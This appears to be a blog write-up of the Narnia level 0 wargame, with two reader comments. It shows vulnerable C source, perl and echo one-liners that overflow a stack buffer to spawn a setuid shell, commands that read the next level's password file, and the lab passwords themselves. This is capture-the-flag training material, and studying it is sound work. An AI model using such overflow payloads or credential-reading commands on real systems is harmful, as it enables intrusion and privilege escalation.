# Narnia wargame: Level 0


# ssh narnia0@narnia.labs.overthewire.org
narnia0@narnia.labs.overthewire.org's password:6e61726e696130

narnia0@melissa$ file /narnia/narnia0
/narnia/narnia0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia0@melissa$ cat /narnia/narnia0.c
#include <stdio.h>
#include <stdlib.h>

int main(){
        long val=0x41414141;
        char buf[20];

        printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
        printf("Here is your chance: ");
        scanf("%24s",&buf);

        printf("buf: %s\n",buf);
        printf("val: 0x%08x\n",val);

        if(val==0xdeadbeef)
                system("/bin/sh");
        else {
                printf("WAY OFF!!!!\n");
                exit(1);
        }

        return 0;
}
narnia0@melissa$ perl -e 'print "a"x20 . "\xef\xbe\xad\xde"'
aaaaaaaaaaaaaaaaaaaaï¾­Þnarnia0@melissa$ cat | /narnia/narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
aaaaaaaaaaaaaaaaaaaaï¾­Þ
Here is your chance: buf: aaaaaaaaaaaaaaaaaaaaï¾­Þ
val: 0xdeadbeef
/usr/bin/whoami
narnia1
/bin/cat /etc/narnia_pass/narnia1
65666569646965646165
^C
narnia0@melissa$ (perl -e 'print "a"x20 . "\xef\xbe\xad\xde"' ; echo "/usr/bin/whoami" ; echo "/bin/cat /etc/narnia_pass/narnia1") | /narnia/narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: aaaaaaaaaaaaaaaaaaaaï¾­Þ
val: 0xdeadbeef
narnia1
65666569646965646165
narnia0@melissa$ (((echo -e "aaaaaaaaaaaaaaaaaaaa\xef\xbe\xad\xde" ; exit) ; echo "/usr/bin/whoami") ; echo "/bin/cat /etc/narnia_pass/narnia1") | /narnia/narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: aaaaaaaaaaaaaaaaaaaaï¾­Þ
val: 0xdeadbeef
narnia1
65666569646965646165

2 comments:

Unknown said...

the passwd is invaluable

Anonymous said...

when i enter
$(perl -e 'print "A"x20,"\xef\xbe\xad\xde"')|/narnia/narnia0
it doesn't show shell...

by the source code of program, when i enter 0xdeadbeef in val, it must execute /bin/sh. doesn't it?
but after the input, it shows that val is 0xdeadbeef and that's all. i don't know the reason.
plz tell me what's the matter?